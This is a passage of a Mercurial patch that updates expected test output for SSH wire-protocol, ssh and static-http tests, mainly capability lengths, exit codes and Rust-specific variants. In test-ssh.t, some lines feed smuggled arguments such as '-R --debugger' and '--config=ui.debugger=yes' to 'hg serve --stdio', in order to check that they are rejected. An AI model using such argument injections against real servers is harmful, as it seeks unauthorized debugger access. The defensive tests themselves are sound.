streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n `hg debugserve --sshstdio` works @@ -96,7 +103,7 @@ $ hg debugserve --sshstdio << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash I/O logging works @@ -106,24 +113,24 @@ > EOF e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset 
getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> flush() -> None $ hg debugserve --sshstdio --logiofile $TESTTMP/io << EOF > hello > EOF - 463 + 444 capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash $ cat $TESTTMP/io e> flush() -> None o> write(4) -> 4: - o> 463\n - o> write(463) -> 463: + o> 444\n + o> write(444) -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> flush() -> None @@ -149,8 +156,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -187,7 +194,7 @@ remote: banner: line 7 remote: banner: line 8 remote: banner: line 9 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -245,8 +252,8 @@ o> readline() -> 15: o> banner: line 9\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -297,12 +304,12 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n + o> 
444\n i> write(98) -> 98: i> between\n i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 - o> readline() -> 463: + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -316,7 +323,7 @@ sending hello command sending between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -365,8 +372,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -390,7 +397,7 @@ remote: 0 remote: 0 remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -447,8 +454,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -494,8 +501,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> 
capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -539,8 +546,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -609,8 +616,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Incomplete dictionary send @@ -691,8 +698,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -725,8 +732,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -768,8 +775,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey 
streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -797,8 +804,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(105) -> 105: i> between\n @@ -838,8 +845,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -887,8 +894,8 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -914,7 +921,7 @@ o> readline() -> 41: o> 68986213bd4485ea51533535e3fc9e78007a711f\n o> readline() -> 4: - o> 463\n + o> 444\n Send an upgrade request to a server that doesn't support that command @@ -943,8 +950,8 @@ i> pairs 81\n i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -962,7 
+969,7 @@ sending hello command sending between command remote: 0 - remote: 463 + remote: 444 remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 devel-peer-request: protocaps @@ -1005,8 +1012,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n $ cd .. @@ -1081,7 +1088,6 @@ remote-changegroup http https - rev-branch-cache stream v2 @@ -1114,14 +1120,14 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 447\n - o> readline() -> 447: + o> 428\n + o> readline() -> 428: o> capabilities: branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n Multiple upgrades is not allowed @@ -1152,8 +1158,8 @@ o> readline() -> 44: o> upgraded this-is-some-token exp-ssh-v2-0003\n o> readline() -> 4: - o> 462\n - o> readline() -> 463: + o> 443\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(45) -> 45: i> upgrade another-token proto=irrelevant\n @@ 
-1224,8 +1230,8 @@ i> write(6) -> 6: i> hello\n o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -1343,8 +1349,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1381,8 +1387,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1431,8 +1437,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1461,8 +1467,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - 
o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1492,8 +1498,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1525,8 +1531,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1559,8 +1565,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() 
-> 2: o> 1\n @@ -1595,8 +1601,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1634,8 +1640,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1674,8 +1680,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -1726,8 +1732,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known 
lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1759,8 +1765,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1809,8 +1815,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1847,8 +1853,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1886,8 +1892,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 
463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1922,8 +1928,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1959,8 +1965,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1992,8 +1998,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -2030,8 +2036,8 @@ i> 
0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2071,8 +2077,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -2137,8 +2143,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2177,8 +2183,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey 
streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending batch with 3 sub-commands diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -64,8 +64,10 @@ $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream streaming all changes - 8 files to transfer, 827 bytes of data - transferred 827 bytes in * seconds (*) (glob) + 8 files to transfer, 827 bytes of data (no-zstd !) + transferred 827 bytes in * seconds (*) (glob) (no-zstd !) + 8 files to transfer, 846 bytes of data (zstd !) + transferred * bytes in * seconds (* */sec) (glob) (zstd !) updating to branch default 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cd local-stream @@ -390,6 +392,7 @@ abort: destination 'a repo' is not empty [10] +#if no-rhg Make sure hg is really paranoid in serve --stdio mode. It used to be possible to get a debugger REPL by specifying a repo named --debugger. $ hg -R --debugger serve --stdio @@ -402,6 +405,27 @@ $ hg -R narf serv --stdio abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] [255] +#else +rhg aborts early on -R without a repository at that path + $ hg -R --debugger serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --debugger not found (known-bad-output !) + [255] + $ hg -R --config=ui.debugger=yes serve --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] (missing-correct-output !) + abort: repository --config=ui.debugger=yes not found (known-bad-output !) + [255] + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] (missing-correct-output !) + abort: repository narf not found (known-bad-output !) 
+ [255] +If the repo does exist, rhg finds an unsupported command and falls back to Python +which still does the right thing + $ hg init narf + $ hg -R narf serv --stdio + abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] + [255] +#endif Test hg-ssh using a helper script that will restore PYTHONPATH (which might have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right @@ -463,7 +487,7 @@ remote: Permission denied remote: pretxnopen.hg-ssh hook failed abort: push failed on remote - [255] + [100] $ cd $TESTTMP @@ -518,9 +542,11 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) 
devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) @@ -537,7 +563,7 @@ no changes found devel-peer-request: getbundle devel-peer-request: bookmarks: 1 bytes - devel-peer-request: bundlecaps: 289 bytes + devel-peer-request: bundlecaps: 270 bytes devel-peer-request: cg: 1 bytes devel-peer-request: common: 122 bytes devel-peer-request: heads: 122 bytes @@ -655,7 +681,7 @@ remote: rollback completed remote: pretxnchangegroup.fail hook failed abort: push failed on remote - [255] + [100] abort during pull is properly reported as such @@ -670,7 +696,7 @@ searching for changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] abort with no error hint when there is a ssh problem when pulling diff --git a/tests/test-static-http.t b/tests/test-static-http.t --- a/tests/test-static-http.t +++ b/tests/test-static-http.t @@ -231,8 +231,6 @@ /.hg/bookmarks /.hg/bookmarks.current /.hg/cache/hgtagsfnodes1 - /.hg/cache/rbc-names-v1 - /.hg/cache/rbc-revs-v1 /.hg/dirstate /.hg/requires /.hg/store/00changelog.i @@ -248,8 +246,6 @@ /remote-with-names/.hg/bookmarks.current /remote-with-names/.hg/cache/branch2-served /remote-with-names/.hg/cache/hgtagsfnodes1 - /remote-with-names/.hg/cache/rbc-names-v1 - /remote-with-names/.hg/cache/rbc-revs-v1 /remote-with-names/.hg/cache/tags2-served /remote-with-names/.hg/dirstate /remote-with-names/.hg/localtags @@ -266,7 +262,6 @@ /remote/.hg/cache/branch2-served /remote/.hg/cache/hgtagsfnodes1 /remote/.hg/cache/rbc-names-v1 - /remote/.hg/cache/rbc-revs-v1 /remote/.hg/cache/tags2-served /remote/.hg/dirstate /remote/.hg/localtags @@ -288,8 +283,6 @@ /sub/.hg/bookmarks /sub/.hg/bookmarks.current /sub/.hg/cache/hgtagsfnodes1 - /sub/.hg/cache/rbc-names-v1 - /sub/.hg/cache/rbc-revs-v1 /sub/.hg/dirstate /sub/.hg/requires /sub/.hg/store/00changelog.i diff --git a/tests/test-stream-bundle-v2.t b/tests/test-stream-bundle-v2.t --- a/tests/test-stream-bundle-v2.t +++ b/tests/test-stream-bundle-v2.t @@ -46,9 
